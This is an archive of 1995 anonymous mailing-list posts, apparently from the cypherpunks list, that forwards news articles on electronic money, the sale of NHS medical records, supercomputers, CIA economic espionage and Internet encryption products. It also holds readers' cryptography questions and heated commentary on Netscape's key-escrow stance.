companies, from convenience stores to telephone
companies. Nor is this the only trend threatening the
Fed's monopoly: Information technology is about to permit
the creation of both electronic token money and cash
money in cyberspace. Already we have Digi Cash in
Amsterdam reviving in modern guise something very close
to the old American free-banking system -- issuing
electronic money (backed by some depository bank holding
collateral in the form of Treasury securities) and
performing the clearing function.
None of this is necessarily a cause for panic. There is
very little, if any, evidence that government has managed
our currency values any better than the commercial banks
did in pre-Fed days. Indeed, the Nobel laureate economist
F.A. Hayek put it more strongly: "The history of
government management of money has, except for a few
short happy periods, been one of incessant fraud and
Still these new trends do present worries for central
bankers. If more and more firms issue cards for cash or
credit, what will be the effect on the velocity of money?
How will central banks form policies on the control of
the money supply if any company can issue electronic
purse cards on credit, with or without collateral? What
will happen if the issuer of the card goes broke?
As smart cards become more visible in America, regulators
and governments will begin to wonder about control of
money and credit. The Eulopean system of central banks
has produced an advisory report outlining a possible
regulatory response, and in this countly some Fed
officials are starting to wonder if their regulations
will be applicable. If one definition of money is an
object that has no use except to be given to someone else
in exchange for goods or services, smart cards are money

@_date: 1995-11-27 06:06:33
@_author: Anonymous 
@_subject: Junk E-Mail - Part 4 
It does and has for years and years, every day.
      Maybe you meant the editorial page?

@_date: 1995-11-27 11:52:36
@_author: Anonymous 
@_subject: For sale: your secret medical records 
The Sunday Times, Top page one, 26 Nov 1995
For sale: your secret medical records for L150
by Lois Rogers and David Leppard
Confidential medical records of politicians, celebrities
and millions of other National Health Service patients
can be bought on the information black market for L150.
The contents of the files comprising patients' most
personal health details dating back 30 years, are being
sold to order by high-street detective agencies
advertising in the Yellow Pages.
The Sunday Times has discovered that GP practices across
Britain are failing to safeguard files which contain
sexual, mental and physical histories of patients. Files
on sale last week revealed how named patients had
vasectomy operations, or had a family history of
Alzheimer's disease and precancerous growths. They also
included the type and dose of medication prescribed,
visits to casualty units, and injuries suffered in road
The disclosures have prompted calls by opposition MPs and
doctors' leaders for urgent laws to protect the security
of the health records of Britain's 56.5m patients.
Alan Milburn, a Labour health spokesman, said he would be
asking Stephen Dorrell, the health secretary, to conduct
an urgent inquiry. "This is a violation of the special
relationship between doctors and their patients," said
Milburn. "I find it disturbing and deeply sinister.
Patients will be horrified to learn that their records
can be accessed by unknown organisations."
Alex Carlisle, the Liberal Democrat home affairs
spokesman and a lay member of the General Medical
Council, said: "It is ethically and morally outrageous
that organisations of any kind should obtain details like
that without consent. It is contrary to everything we are
told about the confidentiality of medical records. This
should be a crime punishable by imprisonment."
Milburn and Carlile were among more than a dozen people
who last week allowed The Sunday Times to expose the
security failures in the NHS records system by giving the
newspaper permission to access their confidential files
through commercial agencies.
The problem first came to light when one agency said it
was receiving more and more commissions from big
employers who wanted it to carry discreet checks on the
medical backgrounds of their employees. The agencies,
many of which advertise "private searches" in the Yellow
Pages, offer their services for fees ranging from L150 to
They offer to provide a written summary of anybody's
complete medical files within three hours. All they
require is the name, address and date of birth of the
patient they are investigating. They are thought to be
able to obtain the records by impersonating medical staff
and persuading them to disclose contents of the NHS files
over the telephone.
Last week a Sunday Times reporter posing as a prospective
client contacted 10 private detective agencies chosen at
random from the Yellow Pages. "Most of this stuff is on
manual records," said one employee of a London agency.
"It is pretty well protected. We're not officially
allowed [to do this] but it's perfectly possible." A
second private investigator said: "It's just a question
of knowing who and what to ask."
However, most declined to discuss the methods they used.
"What we are doing is illegal, and I'm not going into the
details over the telephone," said another agent in
Robertsbridge, East Sussex.
Dr Sandy Macara, chairman of the British Medical
Association council, which represents 105,000 doctors,
was among those who agreed to take part in the exercise.
Details of his medical and surgical history were provided
after a brief telephone call by a reporter to a private
agency. The information was faxed to the newspaper within
three hours, after a price of L150 was quoted. "This is
incredible. I cannot imagine how they have got this
information," Macara said.
The ease with which the health files could be obtained
posed a threat to the Electronic Patients' Records, a new
computer database which will soon contain the files of
all NHS patients in England and Wales, Macara said. "We
will have to ensure the new nationwide computer network
is as secure as humanly possible, and press for a
statutory right to confidentiality of patient
Elizabeth France, the data protection registrar, said the
Criminal Justice Act had recently tightened the law
regarding information obtained by deception. But the
penalties apply only to information held on computer,
rather than medical notes, which at present are held
mainly on hand-written files. "This is something we take
very seriously," France said. "We are actively pursuing
it. It doesn't mean the problems have been solved."
John Wadham, director of Liberty, the civil rights group,
called on the government to introduce a new criminal
offence of obtaining information by deception. "Such
information can obviously include material about sexually
transmitted diseases and material about an individual's
physical and mental health," he said. "There clearly
needs to be a right to privacy so the courts can act
against this."
Baroness Cumberlege, the junior health minister, said
confidentiality remained a cornerstone of the NHS. "We
are about to issue strengthened guidelines for security
of records within hospitals and new measures for
unauthorised access from external sources," she said. "We
are having discussions with the BMA and the Data
Protection Agency specifically about these issues."

@_date: 1995-11-28 09:57:15
@_author: Anonymous 
@_subject: Cray's New T3E 
WSJ, Nov 27, 1995
Cray Research to Unveil 2nd-Generation Parallel Processor
for Technical Market
By William M. Bulkley
Cray Research Inc., bidding to reassert its dominance of
high-end scientific supercomputing, is expected to unveil
tomorrow a new parallel-processing supercomputer with
unprecedented speed.
The Eagan, Minn., computer maker has been best-known for
its multimillion-dollar vector supercomputers that use
just a few very powerful processors. The new Cray T3E
will be its second-generation parallel processor. Unlike
its predecessor the T3D, it operates without being
connected to a traditional vector supercomputer.
People familiar with the machine say it will have a
theoretical top speed of more than one trillion
operations a second, or one teraflops, a measure of
supercomputer speed. Currently the only planned teraflops
machine is one that Intel Corp. is building for the
Energy Department's Sandia National Laboratories.
'Back in the Game'
"We look at this as evidence of Cray reasserting its
franchise in the technical computing market," said Debra
Goldfarb, who follows supercomputers for International
Data Corp., a market research firm in Framingham, Mass.
"Cray's back in the game."
The smallest models are likely to be priced at well under
$1 million. Buyers will be able to increase power by
adding just a few processors at a time in the future
making the systems "highly scalable" in industry
parlance. The T3E can be built with as few as 16
processors or as many as 2,048 processors.
"This reconfirms Cray's capabilities to build very
efficient high-performance computers," said Philip
Samper, chairman and chief executive officer, who was
hired last spring. Cray has said it will report a net
loss for the current year, reflecting restructuring
charges as Mr. Samper cuts costs, and sales are weak as
customers have been waiting for new generations of both
Cray's T90 vector supercomputers and the T3E. Mr. Samper
said that Cray will be profitable in the current fourth
quarter on an operating basis before an expected
restructuring charge, and "We expect to be profitable in
1996. That's very important for this company."
Mr. Samper, who declined to discuss details of the T3E,
said in an interview, "We have $100 million in orders
already in house. When customers get so excited they put
money on the line, that's the ultimate test." The T3E
won't be available for sale until the end of the first
quarter of 1996. Cray's total backlog was $355 million at
the end of the third quarter, including orders for the
Cray, the longtime leader in scientific supercomputing,
faced challenges from a host of smaller companies in the
late 1980s as well as three big Japanese computer makers.
But with the end of the Cold War, military need for
supercomputers diminished, Cray's sales plateaued and
several of the smaller companies went out of business.
Offsetting Some Declines
Analysts estimate the high-performance-computer market at
about $3 billion a year, with growth in commercial
markets for large databases and video-servers for
interactive-media, offsetting declines in government
business. International Business Machines Corp. and
Silicon Graphics Inc. have both grown rapidly by selling
parallel-processing systems in those markets.
Cray sells small commercial supercomputers and commercial
servers for computer networks of Sun Microsystems Inc.
workstations. However, analysts say it needs revenue from
the high-performance scientific market to rebound. Jay P.
Stevens, an analyst with Dean Witter, says sales in the
current year will fall 27% to $615 million from $921.6
million. Next year he forecasts a 20% rise to $808
million. Mr. Stevens predicts a net loss before charges
for 1995 of $73 million, or $1.25 a share, compared with
net income of $55.7 million, or $2.32 a share, in 1994.
Mr. Samper said that during the year, Cray has reduced
research-and-development spending by 16% and lowered
overheads. He said it plans to buy more parts from
outside suppliers, and is also controlling costs by
negotiating with government agencies to have them pick up
certain research and support costs.

@_date: 1995-11-29 10:47:12
@_author: Anonymous 
@_subject: PGP hooks for Pegasus Mail? 
I find it bizarre that what little is going on in real integration of PGP for e-mail users is not mentioned on cp, perhaps unknown, certainly not of interest to those who should be interested.
What is going on is going on with respect to Pegasus, and what mention of it there is is not on cp but on the Pegasus Mail list.
Apparently cypherpunks *don't* write code, and PMail people *do*.
Do a million registered users and an e-mail program with hooks already originating outside the U.S. penetrate anyone's consciousness?
----- wake-up rant OFF -----
 ------------  ------------
 ---------------------------------------------------------
Unofficial Wang VS Information Center

@_date: 1995-11-30 14:32:34
@_author: Anonymous 
@_subject: Applied Cryptography Questions 
A couple questions about Applied Cryptography (Second Edition)
1. What on earth is a Neural Net?
2. Consider the Chinese Lottery attack vs a processor bank.
   ADVANTAGES
     Distributed computing, no easy bombing target.
   DISADVANTAGES
     39% inefficient
     Need specialized hardware [for speed] or transmission of alogrithms
       for any specific alogrithm
     Not on all the time
     If value(crack) * cracks/chip > cost of chip, then why not have
       the gov buy the chips? Its probably cheaper that way.
3. How does one cryptoanalyize a Feistel Network? I've read a bit
   on this and it doesn't seem that the papers are consistant,
   for example, one claims that 2^32 chosen plaintext is unreasonable
   for a 64-bit block cipher whereas DES's cryptanalysis requires
   something like 2^42.
4. Does there exist an n such that a keyspace of 2^n is trivial to crack
   [ie a matter of miniutes] on a PC but is difficult to crack for a    big commercial company or even a major government? [this question
   relates to Merkle's puzzles, when a 40-bit key seems a bit weak.]
5. Is there an errata yet?

@_date: 1995-11-30 17:11:04
@_author: Anonymous 
@_subject: Netscape gives in to key escrow 
At 11/30/95 3:07 AM, Futplex quoted:
 ...
 ...
      "A stake in its heart," more like.
 ...
      Well, spamming the sign won't do.
      Aleph One's suggestion -- an NS-hack or "virus" -- doesn't make any
sense: if Perry or someone would vet a hacked copy, I'd use it in a
second. But hacking it would involve a violation of the license, so hacked
versions couldn't be offered in any above-ground way: there'd be no way to
certify a hacked copy with a trusted nym's key.
      Netscape is between a rock and a hard place: I think it's safe to
say that, were all things equal, NS would support strong crypto. The fact
that NS has decided otherwise suggests that some pressure was applied:
Clark says as much. This leads me to believe that one possibly effective
(and possibly dangerous) tactic might lie in a seriously sustained attack
on NS's reputation -- keeping up a meme-drumbeat of "you can't trust
Netscape, that's all, you'll get ripped off." I think we should try it --
TODAY, now, persistently and loudly, until NS comes around. I'm not saying
that this'll be enough, but it's a start. TODAY. And I really don't care
what it takes: calling cronies in the press, spreading innuendo, redoing
NS icon sets so there's a spy from "Spy Versus Spy" loitering behind the
N... I've seen some nice "NO Netscape" tags on GNU-related pages. Let's do
FB DD B5 C8 FB F4 52 41  F0 0F A0 6E 99 43 75 06

@_date: 1995-11-30 17:20:40
@_author: Anonymous 
@_subject: Netscape gives in to key escrow 
At 11/30/95 3:07 AM, Futplex quoted:
 ...
 ...
      "A stake in its heart," more like.
 ...
      Well, spamming the sign won't do.
      Aleph One's suggestion -- an NS-hack or "virus" -- doesn't make any
sense: if Perry or someone would vet a hacked copy, I'd use it in a
second. But hacking it would involve a violation of the license, so hacked
versions couldn't be offered in any above-ground way: there'd be no way to
certify a hacked copy with a trusted nym's key.
      Netscape is between a rock and a hard place: I think it's safe to
say that, were all things equal, NS would support strong crypto. The fact
that NS has decided otherwise suggests that some pressure was applied:
Clark says as much. This leads me to believe that one possibly effective
(and possibly dangerous) tactic might lie in a seriously sustained attack
on NS's reputation -- keeping up a meme-drumbeat of "you can't trust
Netscape, that's all, you'll get ripped off." I think we should try it --
TODAY, now, persistently and loudly, until NS comes around. I'm not saying
that this'll be enough, but it's a start. TODAY. And I really don't care
what it takes: calling cronies in the press, spreading innuendo, redoing
NS icon sets so there's a spy from "Spy Versus Spy" loitering behind the
N... I've seen some nice "NO Netscape" tags on GNU-related pages. Let's do
FB DD B5 C8 FB F4 52 41  F0 0F A0 6E 99 43 75 06

@_date: 1995-11-30 18:17:39
@_author: Anonymous 
@_subject: Applied Cryptography Questions 
A couple questions about Applied Cryptography (Second Edition)
1. What on earth is a Neural Net?
2. Consider the Chinese Lottery attack vs a processor bank.
   ADVANTAGES
     Distributed computing, no easy bombing target.
   DISADVANTAGES
     39% inefficient
     Need specialized hardware [for speed] or transmission of alogrithms
       for any specific alogrithm
     Not on all the time
     If value(crack) * cracks/chip > cost of chip, then why not have
       the gov buy the chips? Its probably cheaper that way.
3. How does one cryptoanalyize a Feistel Network? Is there a general
   method?
4. Does there exist an n such that a keyspace of 2^n is trivial to crack
   [ie a matter of miniutes] on a PC but is difficult to crack for a    big commercial company or even a major government? [this question
   relates to Merkle's puzzles, when a 40-bit key seems a bit weak.]
5. Is there an errata yet?

@_date: 1995-11-30 22:58:26
@_author: Anonymous 
@_subject: Quit it! 
I am me!  No I am not!
Yes I am!
No I'm not!    Alice de 'nonymous ...
                                    ...just another one of those...
  P.S.  This post is in the public domain.
                      C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

@_date: 1995-12-01 08:13:13
@_author: Anonymous 
@_subject: nonetest 
12890 87221 56907 00458 94225
40838 75693 98239 87802 85834
98347 49857 21349 12038 14896
09343 87458 98589 32759 74545

@_date: 1995-12-01 14:42:09
@_author: Anonymous 
@_subject: Netscape gives in to key escrow 
Yes, bad. Yes, almost. Like a psychotic, Netscape has been teasing people with annoyingly buggy "betas," seeming to be well-intentioned, innocently clumsy, forgivable for its enthusiasm. Now the mask drops and we see the feral beast.
As usual, Tim states it concisely, even elegantly.
I can assure those who doubt this that Jim did not wake up one morning saying, "Gee, this security thing is just so-o-o-o big a nut to crack that we need to bump it upstairs to the Big Boys. Yeah! That's it! Uncle Sam will make the Internet safe for commerce! Boy, this is going to be a great day! Hey, Mom! Can I have a slice of your great apple pie for breakfast?  B-r-r-r!  It's brisk this morning! Mom, Where did you put my flag?"
With Netscape's sudden and surprising rise to prominence, its executives have no doubt been getting a crash course on what it's like to live in the world of people who take power and money VERY seriously. They've no doubt been disabused of childish notions and shown the glint of steely knives in the recesses of three-piece suits. No doubt more than one stomach plummeted to the sub-basement as they learned that Wonderland is populated by dark and deadly predators who don't just meekly make room for a new player.
Jim may not even be important enough to have been the one visited, but we can be sure someone was visited and explained some of the rules by which the full-contact professional game is played. What we are witnessing here is the loss of innocence, noticeable only because the time scale is so compressed by Netscape's explosive rise.
It's not even so much their caving that disgusts -- it's the hypocrisy. It's the lack of balls to say, "Guess what?  We got a most unusual visit by so-and-so who spoke unofficially for so-and-so, who wants us to know that we'll be toast if we push this issue of strong crypto."
It's as if someone you know suddenly takes up living with the creepy-crawlies in dark, damp places under rocks. One day you lift a rock and discover them there with some surprise, but instead of emerging or explaining, they say, "I like it here! This is the proper way to live!" and pull the rock back into place. It's not natural.
The Feds' approach to this kind of thing will be to make circumvention of escrow punishable by, say, a $10 million fine and 30 years in prison, with a teensy little provision that it doesn't matter how it comes to their attention.  That way, you not only run the risk that they find out by virtue of you having become a target of authorized eavesdropping, you run the risk that a, um, mistaken or, er, collateral eavesdrop reveals that your communications are circumventing escrow.
People in Montana and Nevada probably once thought the highway speed genie was out of the bottle, but all it took was fuel-shortage hype to enact a law effectively instituting a "national" speed limit, even though federal control of travel on roads outside federal reservations is wholly without constitutional authority.  Most people have some contact with issues of cars, gasoline, speed, and fuel economy, yet there was barely a whimper. How likely is it that more than a few percent of the population will even grasp what is being done to them with key escrow and the PR flim-flam that will be used to spackle over the real issues?
I have.  I'll reconsider when Jim reveals who inoculated him with GAK juice and when Netscape own up to how they caved and publicly disavow the position he advanced.
Not to be overly dramatic, but this sounds like a non-policy German expatriate might have sounded in the late 1930's, trying to quell alarm over reports of atrocities filtering out of the Reich. It may be well-intentioned, but it's out of the loop.
This is the "turd in the punchbowl" principle, Jeff. Suppose your Presidential candidate sounded fine in 95% of his coverage, and only in 5% is he reported to advocate raising human children on farms for organ harvest? How big a turd does there have to be in the punchbowl before you will consider the punch unfit to drink? "Well, hell! There's only the ONE, and it's not even as big as the ice cubes!"  Right.
So we're supposed to operate on the same blind faith you display. Right.
Jeff, what you're revealing is a bit of confusion with respect to who runs the company. With all due respect, and taking your statements at face value without reading subterfuge into them, I believe you're in the dark, and positioned to get a hard lesson in real world corporate politics. Do you like your job? Do you have a mortgage? If this doesn't go down the way you think it's going, will YOU tell all?
Dark periods of history are full of well-intentioned people who, in the crunch, opted to save their own skins and facilitated whatever they were told to facilitate.
You can be sure of that. Meanwhile, if you really have principles, start taking names. Names, dates, places, things. If you're right, you can throw it all away later. If we're right, you'll have an opportunity to shed light on the process sometime down the road.
We Jurgar Din
(that will have to suffice: I do not yet live in a free country)
+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +

@_date: 1995-10-03 07:53:59
@_author: Anonymous 
@_subject: economic espionage (@#$%^&*) (fwd) 
NY Times, Oct 3, 1995, Business Employment Ad.
1984 Sarajevo, Olympics; 1995 Sarajevo, Battleground
Every day in our world, new threats, new challenges, new
missions emerge. The people of the Central Intelligence
Agency are dedicated to meeting the missions of the day,
providing information and resources that aid decision
makers in solving the problems and responding to issues
that affect us all.
You can play an integral role in our mission, while
advancing your own career.
The Central Intelligence Agency is currently seeking
professional men and women who will be comfortable living
and working abroad. These positions entail extended
overseas assignments in various parts of the world.
Previous service in long-term foreign assignments, in
either business or government positions, is a definite
Changing international economic, political and social
conditions make a broad range of professional backgrounds
suitable for these positions. Your experience may be in
economics finance, marketing, or general business.
Scientific or technical experience in engineering
disciplines, physical sclences, biological sciences, or
any area of high technology research and development is
of particular interest.
These overseas positions require more than appropriate
professional experience. Successful candidates must also
demonstrate a high degree of individual initiative, self
reliance and personal integrity. Naturally, the ability
to speak or learn a foreign language is expected along
with above average communications skills, both oral and
written. A Bachelor's degree is a minimum requirement.
Advanced degree or military service is a plus.
All applicants must successfully complete a thorough
medical and psychiatric exam, a polygraph interview, and
an extensive background investigation. U.S. citizenship,
or eligibility for citizenship, is required. CIA
encourages applications from men and women of every
racial and ethnic background from all parts of the nation

@_date: 1995-10-05 15:59:52
@_author: Anonymous 
@_subject: NetManage & Cylink Crypto 
NetManage & Cylink In Internet Encryption Deal
Guildford, Surrey, England, Oct 5 -- NetManage, a TCP/IP
specialist company, has signed a licensing deal with
Cylink Corporation. NetManage says the Cylink public key
cryptography technology will be incorporated in future
editions of NetManage's Internet applications software.
The move is significant since it marks the beginnings of
a competitor to the Netscape "secure" Web browsing
software, which has had two security flaws identified in
recent weeks.
Initially, NetManage's Chameleon Enterprise TCP/IP
applications suite will incorporate the Cylink public key
encryption technology, and later will include encryption
facilities in Internet Chameleon, a UKP139 PC-Windows
access suite designed for dial-up access to the Internet.
Both NetManage and Cylink plan to support an open
interface for Internet security which addresses the flaws
found in Netscape. The idea is to establish an open set
of standards to which Internet access packages of all
types will adhere to, and so ensure that companies
developing Internet software do not "re-invent the wheel"
when writing their software, and possibly open their
applications up to flaws.
According to NetManage, establishing a secure Internet
connection requires an Internet application to perform
two functions: authenticating the user, and encrypting
the data flow.
The link with Cylink will allow NetManage to license and
include the Cylink public key encryption technology in
its applications with a variety of ciphering systems to
be used in the NetManage suite, including: DES, Triple
DES, Safer, IDEA, Skipjack, RC-2, and RC-4.
NetManage claims the current implementations of security
proposed as standards by Netscape and RSA Data Security
are flawed, and fail to fully accommodate "open and
interoperable secure communications" between computers
which use different bulk encryption ciphers.
These problems, the company claims, have limited the
adoption of Internet security as a widespread
interoperable feature of all Internet software and
hardware products, including end-user applications,
servers, firewalls, and secure routers.
Later this month, NetManage and Cylink plan to announce
a next-generation "plug and play" Internet encryption
system. The implementation will be open and will not lock
software or hardware developers into the use of
encryption technology from any one vendor, as is the case
with Netscape, say the companies.
The related APIs, key exchange technology, and
encryption, will be made publicly available to other
software and hardware vendors. Licensing will include
source code and no per-copy royalty fees.
Further information can be downloaded from NetManage's
World Wide Web site at .
Contact: NetManage Europe, +44-1483-302333;
NetManage US, 408-973-7171.

@_date: 1995-10-06 04:07:32
@_author: Anonymous 
@_subject: PCMCIA Crypto 
PCMCIA Establishes Security Card Working Group
The dream of a standardized encryption interface may soon
be realized!
San Jose, Calif., Oct. 5 /PRNewswire/ -- PCMCIA has
formed a new Working Group dedicated to standardizing and
promoting the PC Card as an interface for data encryption
and digital signature applications.
The Working Group was formed to work within the PCMCIA
Technical Committee to help the Association define and
standardize the capabilities and requirements for PC Card
Security Card devices.  The Group's immediate goals are
to define the necessary extensions to the PC Card
Standard that will allow easy identification of Security
Card devices, and to proactively identify other vendors
in the market and solicit their support for standardizing
PC Cards as a security device.
The formation of this Group represents the formalization
of an industry trend.  A standardized form factor and
interface for security devices is finally an attainable
goal thanks to the widespread acceptance of PC Card
technology," said Gary Visser, a senior software engineer
with Spyrus Communications and Co-Chairperson of the
Working Group.  "It is this high level of host support
that will promote PC Cards as a solution for electronic
banking and commerce."
PC Cards are seen by many experts as an ideal solution
for digital signature and data encryption applications
due to the established base of PC Card slots, and because
most security applications are math intensive and require
the processing power and storage of computers.
The proposal to form the Group was presented to PCMCIA by
Spyrus, Inc. of San Jose, California.  The group will be
co-chaired by Edward Tuggle of IBM Corporation and Visser
of Spyrus, Inc.
Visit PCMCIA's World Wide Web site at
Contact:  Greg Barr, Public Relations Coordinator, of
PCMCIA, 408-433-2273, ext. 114, or .

@_date: 1995-10-06 09:10:18
@_author: Anonymous 
@_subject: National Secuirty Science and Technology Strategy 
This excerpt is from the summary of a long policy
statement on the National Security Science and Technology
Strategy published by the White House on September 19.
The full report is well worth reading -- it addresses
military, economic, intelligence, scientific and
technological issues and lays out projected initiatives.
Has anyone seen news reports on this?                    Executive Summary
In March 1995, President Clinton ordered a sweeping
reexamination of the United States Government's approach
to putting science and technology to the service of
national security and global stability in light of the
changed security environment, increasing global economic
competition, and growing budgetary pressures.
This National Security Science and Technology Strategy,
the product of that reexamination, is the country's first
comprehensive Presidential statement of national security
science and technology priorities.
It augments the President's National Security Strategy of
Engagement and Enlargement by articulating science and
technology policies and initiatives that support the
President's three primary national security objectives:
enhancing our military readiness and capabilities,
preventing conflict from occurring through engagement
with other nations, and promoting prosperity at home. It
advances that document's central approach of preventing
conflict and maintaining the capability to respond should
conflict occur.
It is built on the recognition that our security depends
on economic strength as well as military power. And it is
grounded in the conviction that investment in science and
technology is central to our ability to meet the
challenges ahead.
This National Security Science and Technology Strategy
defines our new approaches to applying science and
technology to the challenges that most directly affect
our nation's security.
[snip balance of summary]

@_date: 1995-10-08 10:20:16
@_author: Anonymous 
@_subject: Nat Sec Eco Espo 
The anonymous post of the White House's National Security
Science and Technology Strategy recalls debate on this policy
underlying reports on CIA economic espionage:
Clinton instructs CIA to focus on trade espionage - report
Los Angeles, Jul 23 (Reuter) - President Clinton has ordered
the Central Intelligence Agency to make economic espionage a
top priority, according to a report in the Los Angeles Times
on Sunday.
The report quotes American intelligence sources who say the
CIA was instrumental in providing U.S. trade negotiators
information during heated auto trade talks with Japan this
spring, and has helped uncover bribes by rival nations
competing with U.S. firms for government contracts.
The sources say Clinton has issued a classified set of
intelligence priorities for the post Cold-War era, and that
the CIA is providing case officers with new training on
economic matters to meet the new challenge.
The recent trade talks with Japan were viewed as a success of
the new policy, according to the Times report. It said U.S.
Trade Representative Mickey Kantor was pleased with the CIA's
ability to report on the bargaining positions of American
But the agency has reportedly been less willing to spy on
individual companies. In one recent success in that area the
CIA discovered that the French were offering bribes to
Brazilian officials to help telecommunications giant Thompson
win a government contract. The report says intelligence
information helped U.S.-based Raytheon Co. elbow out Thompson
of France to win the work.
But the problem in such work, say intelligence sources, is
determining which multinational corporations based in the
United States should be considered "American" firms deserving
assistance. Because of this confusion, CIA officials argue
they should be kept out of spy work targeting individual
foreign business at the behest of U.S. corporations.
Even so, the Times report says the intelligence community has
told Congress it can claim credit for uncovering bribes
affecting $30 billion in foregin contracts over the past few

@_date: 1995-10-10 08:50:32
@_author: Anonymous 
@_subject: PC disk wipe software 
Responding to msg by bdavis at dg.thepoint.net (Brian Davis) on Tue, 10 Oct 10:47 AM
The Washington Post, Oct 9, 1995.
E-Mail That Comes Back And Bites. Even Deleted Messages
Can Be Recovered for Court [excerpts]
Computer sleuth John Jessen dredges computer files for
electronic embarrassments that their authors thought were
long gone. "Deleted" e-mail messages can pile up like
little time bombs until someone such as Jessen arrives,
carrying a court order and a stack of blank memory
"Can you really delete e-mail?  Sure," Jessen said. "Does
it happen as a common practice? No."
Jessen is the founder of Electronic Evidence Discovery
Inc., a Seattle company that since 1987 has been going
after computer evidence in civil lawsuits. The nation's
25 million to 40 million users of e-mail are growing more
comfortable with the medium. And more attorneys are
recognizing e-mail's potential as a source of unguarded
information about the companies they're suing.
"People are very candid talking around the coffee
machine." attorney Michael Patrick of Palo Alto, Calif.,
said. "They seem to behave the same way on the computer
"They think they're speaking confidentially, so they're
off the cuff," he said. "They're very often insulting.
What they don't realize is it's all being recorded, and
often those recordings are stored for a very long time.
When you send a message, you lose control over where it
Many workers think their e-mail is private. It's not.
Federal law allows employers to monitor employees'
e-mail, and even if they don't, e-mail is fair game in
lawsuits. When someone sues a company, the rules of
discovery demand that the company produce all relevant
business records.
"The fact that they live in a computer rather than a file
cabinet doesn't make any difference to the court," said
Joan Feldman at Computer Forensics, another Seattle firm
that specializes in this work.
Often files retrieved include e-mail thought to have been
erased long ago. It survives because the diligent
computer system manager makes backup tapes of everything
on the system every night, then stores those tapes for
And so the files persist and multiply, aided by
technological advances that continually add more storage
capacity, more automatic backups and more redundancies to
safeguard data from accidental erasure.
"The computer is like a file cabinet tbat can open its
own drawer, put a file on the copy machine and then slip
the copy into another cabinet," Jessen said. "Sometimes
I think it's alive."
Jessen and Feldman augment their high-tech detective work
by advising companies how to become less vulnerable to
computer snoops like themselves: They recommend regular
purges of old data, and they offer tips for avoiding
e-mail blunders in the first place. Rule No. 1: Don't put
anything on e-mail that you wouldn't want a jury to see.

@_date: 1995-10-11 05:04:05
@_author: Anonymous 
@_subject: Open Mkt Sudden Infant Death 
Open Market Web Site Launches Free "Internet Security" Cambridge, MA, Oct 10  -- In a teleconference, Open
Market launched a three-pronged attack on Internet
"security breaches" that includes an online "security
checker" for multivendor Web browsers belonging to end
users, free upgrades from the Netscape Secure Server to
the Open Market's Secure WebServer, and the giveaway of
sample code to operators of "any extensible secure Web
The trio of security remedies will all be available free
of charge starting this week from the Open Market Web
site at , officials reported
during the teleconference.
"Our entire business is based on people having trust in
open networks," noted Shikhar Ghosh, Open Market's chief
executive officer (CEO). "We'll make a significant
investment, with the view that all of will suffer if (the
public) loses trust."
Consumers are only "gradually gaining some confidence" in
the Internet, according to Ghosh. But recently, reports
have surfaced of security problems with the Netscape
Secure Server, and some Web sites using the Netscape
product have been "saying they are going to go off the
As a result, he added, Open Market is introducing a
policy that allows licensed users of the Netscape Secure
Server to download Open Market's Secure WebServer "at no
The other two planks in Open Market's new pro-security
Web "resource center" are "informational," the
journalists and analysts were told. Open Market will work
with the makers of Web browsers to track information on
"known problems" with browsers, including browser
tampering. "We will (also) inform the (Web) software
companies of problems," the CEO maintained.
The Open Market Web site will perform a database look-up
on the type of browser in use, and will then report back
to the user on any security issues known to be associated
with that kind of browser, elaborated Open Market's Win
"One strength we have is that we don't have a browser. We
are agnostic," Ghosh told the telephone audience. Open
Market also performs "extensive testing" on Web browsers.
"We do as many as several hundred versions of browsers
coming in at any time. We definitely expect (to) unite
the industry, rather than dividing the industry," he
The sample code to be offered from the Open Market Web
site will provide "underlying code" for "reference
implementations on what are the major ways of handling
the known (Internet security) problems," according to
"To reiterate, security is one of those pillars on which
the entire industry rests," contended the Open Market
chief, to conclude the teleconference.
Contact: Open Market, 617-621-9500; Press Contacts: Wendy
Ziner, Open Market, 617-374-6508; Dawn Geary or Merrill
Freund, Schwartz Communications for Open Market,

@_date: 1995-10-11 09:20:28
@_author: Anonymous 
@_subject: Netscape & Fortessa 
Netscape to Offer Fortezza Cryptographic Capability for
Its Software Products
Underscores Company's Commitment to US Government Market
Mountain View, Calif., Oct. 10 -- Netscape Communications
Corporation announced today its intent to support the
Fortezza security card, a security technology based on US
government standard cryptography, as a low-cost upgrade
capability for its Netscape Navigator(TM) client software
and other Netscape products. The new capability will
enhance Netscape's offerings for the US government market
and enable the company to provide increased support for
security services for World Wide Web-based tools and
Developed by the National Security Agency, Fortezza PC
card technology provides strong authentication and
encryption services using US government standard
cryptography, implemented in an industry-standard PCMCIA
security token.  Fortezza PC cards are being used in the
Defense Message System (DMS), a new Department of Defense
electronic messaging system; Intelink, the new US
Government Intelligence Community search system based on
Web technology, and in a number of other government
"Fortezza is an important technology for major internal
US government networks and for organizations needing
Web-based technology with strong security," said Marc
Andreessen, vice president of technology at Netscape. "Support of Fortezza technology will strengthen our
position as a leading supplier of Web-based software
products to the federal government.  We can use the
experience gained with Fortezza and the Secure Sockets
Layer open protocol to implement support for additional
cryptographic devices important to both the federal
government and commercial markets."
Netscape expects to work with information security
specialist Litronic Industries and others regarding the
development, integration and support of the Fortezza
cryptographic interface.  Litronic provides technical
expertise for the implementation of Fortezza libraries
and drivers on a wide variety of platforms. California-based Litronic Industries designs,
manufactures and markets information security products
used to secure applications and data transmissions
through the use of encryption technology.
Support for Fortezza has been added to Netscape's Secure
Sockets Layer (SSL) open protocol.  SSL provides a
straightforward method for adding strong security to
existing applications and network infrastructures.  SSL
is application protocol independent and provides
encryption, which creates a secured channel to prevent
others from tapping into the network; authentication,
which uses certificates and digital signatures to verify
the identity of parties in information exchanges and
transactions; and message integrity, which ensures that
messages cannot be altered en route.  Netscape will
upgrade Netscape Navigator and other Netscape products to
support the use of Fortezza with SSL as an enhanced
alternative to software-based cryptographic mechanisms.
"The US government is rapidly moving to World Wide Web
and related open systems technology as an alternative to
proprietary networks and applications," said Paul A.
Strassmann, former director of defense information and
principal deputy assistant secretary of defense, and
currently distinguished visiting professor of information
warfare at the National Defense University.  "Many
federal agencies are adopting Fortezza technology as a
means to secure network transactions over unclassified
and classified networks.  We are pleased to see Netscape
provide support for Fortezza cryptographic cards in a
commercial product based on open systems standards."
Contact:  Kristina Lessing of Netscape, 415-528-2661, or
kristina at netscape.com

@_date: 1995-10-11 12:30:47
